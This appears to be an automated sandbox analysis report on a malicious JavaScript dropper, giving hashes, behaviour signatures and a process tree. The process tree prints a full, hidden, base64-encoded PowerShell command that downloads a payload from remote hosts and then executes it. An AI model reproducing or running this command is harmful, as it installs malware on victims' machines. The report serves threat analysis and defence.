Analysis

  • max time kernel
    80s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/05/2023, 01:19

General

  • Target

    7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js

  • Size

    169KB

  • MD5

    677b6481f8fe02de33603553b9ee1b2e

  • SHA1

    1d856b877ff18d5f2777a53421c1084c39dbfd6a

  • SHA256

    7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b

  • SHA512

    74775d7170a961c73889279399974505af63c7d4bb8abbabef10754fb5c61bec6c9fed559947dbb28ff47228ff279322cbc91f1f10676ce6b379cfe2fbf139bb

  • SSDEEP

    3072:IcRjXS0ZkD3FtfRRuTXj3fpby2JKfvf25w206IzIXyl56ExfomXDHiZBtm:vXtkD3FPwTzPpe2JKnf25w2CzIXyl568

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4428
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js" furcilia conglomeriticCremant ohioanBelonoid NotitionPreinterceding
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AG8AdQBjAGgAbwB1AHMAIAA9ACAANwA3ADkAOwAkAEIAbABvAHcAcABpAHAAZQBMAGEAdAByAGkAcwAgAD0AIAAiAGMAbwBlAGwAZQBsAG0AaQBuAHQAaABpAGMAIgA7ACQASABhAHQAYgByAHUAcwBoAE0AYQB6AGEAZQBkAGkAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAD0AcABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAUQBCAGkAQQBHADQAQQBhAFEAQgAyAEEARwBVAEEAWQBRAEIAdQBBAEUARQBBAFoAUQBCAHkAQQBHADgAQQBjAEEAQgBvAEEARwA4AEEAWQBnAEIAcABBAEcATQBBAEwAZwBCAHMAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAYQBRAEIAdQBBAEcAYwBBAHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFEAQQBIAFUAQQBiAEEAQgBoAEEARwBvAEEAWQBRAEIAdQBBAEMANABBAGEAQQBCAHYAQQBIAE0AQQBjAEEAQgBwAEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7ACQAcgBlAGYAbwByAG0AYQBkAG8AIAA9ACAAMQA3ADAAOwAkAE0AaQBkAG8AYwBlAGEAbgAgAD0AIAA5ADIANAA7ACQAdQBuAGQAZQBiAGEAdABlAGQAIAA9ACAAIgBBAG4AdABpAGEAbgBhAHIAYwBoAGkAYwAiADsAJABMAGkAZwBoAHQAcwBvAG0AZQBsAHkAVABhAGwAYQBiAG8AbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAawBBAE8AQQBBAHYAQQBIAEUAQQBaAGcAQgBpAEEARwBZAEEAZABRAEEAdgBBAEUAcwBBAE4AdwBBADEAQQBEAFkAQQBTAFEAQgA0AEEAQQA9AD0AUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBPAEEAQQB2AEEASABVAEEAVgBnAEIAMwBBAEcAMABBAE0AQQBCAEIAQQBDADgAQQBiAEEAQQAzAEEARgBZAEEAVAB3AEIATABBAEgARQBBAE4AZwBCAEIAQQBIAEEAQQBiAEEAQgBEAEEARQAwAEEAUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBWAEEARwBFAEEAWgBnAEIAbwBBAEUAbwBBAGQAUQBCAHAAQQBFAGcAQQBUAFEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHQAaAByAG8AZABkAGUAbgAgAGkAbgAgACQATABpAGcAaAB0AHMAbwBtAGUAbAB5AFQAYQBsAGEAYgBvAG4AIAAtAHMAcABsAGkAdAAgACIAUwA9AHcASQAiACkAIAB7ACQAaQBuAGMAbwByAHIAdQBwAHQAaQBiAGkAbABpAHQAeQBVAG4AdwByAGUAYQB0AGgAaQBuAGcAIAA9ACAAOQA2ADkAOwB0AHIAeQAgAHsAJABVAG4AZQBtAGIAYQBuAGsAZQBkAEUAbgB0AGUAcgBvAG0AZQBzAGUAbgB0AGUAcgBpAGMAIAA9ACAANwA4ADAAOwAkAHMAaAByAGkAZQB2AGUAZABDAGwAbwB0AHUAcgBpAG4AZwAgAD0AIAAiAGIAZQBzAHQAcgBvAHcAaQBuAGcAVABvAHAAaQBhAHIAeQAiADsAJABIAG8AcABwAGUAcgBnAHIAYQBzAHMAQwBhAG0AbQBvAGMAawAgAD0AIAAyADgANQA7ACQAYQB3AGUAcwBvAG0AZQBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdABoAHIAbwBkAGQAZQBuACkAKQA7AHcAZwBlAHQAIAAkAGEAdwBlAHMAbwBtAGUAbAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ADsAJAB2AGUAcgBiAGEAbABpAHMAbQAgAD0AIAAiAGIAbwByAGEAYgBsAGUAIgA7ACQAVAByAG8AcABoAGUAbQBhACAAPQAgADUANwA5ADsAJABlAHMAdABhAG4AYwBpAGEAcwAgAD0AIAAiAEYAYQBpAHQAaABiAHIAZQBhAGsAZQByAE8AbwBlAGMAaQBhACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAxADMANgA2ADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFkAUQBCAGsAQQBHAGsAQQBZAFEAQgB3AEEARwBnAEEAYgB3AEIAeQBBAEcAawBBAGQAQQBCAGwAQQBGAEEAQQBiAHcAQgAwAEEASABNAEEAZABBAEIAcABBAEcATQBBAGEAdwBBAHUAQQBHAGMAQQBaAFEAQgB2AEEARwB3AEEAYgB3AEIAbgBBAEcAawBBAGMAdwBCADAAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEIAbABhAGMAawBiAGEAbABsAGUAcgBIAG8AbQBvAHQAbwBuAGkAYwAgAD0AIAA1ADkANAA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABhAGwAYQBtAGUAZABhAHMAIAA9ACAAMwA1ADcAOwB9AH0AJABTAHkAbgBhAG4AZwBpAHUAbQAgAD0AIAAiAGkAbQBwAG8AdQBuAGQAaQBuAGcAIgA7AA=="
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2016

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nc2ksjqd.ez1.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/2016-138-0x0000014DFFF30000-0x0000014DFFF52000-memory.dmp

          Filesize

          136KB

        • memory/2016-143-0x0000014D818E0000-0x0000014D818F0000-memory.dmp

          Filesize

          64KB

        • memory/2016-144-0x0000014D818E0000-0x0000014D818F0000-memory.dmp

          Filesize

          64KB

        • memory/2016-145-0x0000014D818E0000-0x0000014D818F0000-memory.dmp

          Filesize

          64KB

        • memory/2016-146-0x0000014D818E0000-0x0000014D818F0000-memory.dmp

          Filesize

          64KB

        • memory/2016-147-0x0000014D818E0000-0x0000014D818F0000-memory.dmp

          Filesize

          64KB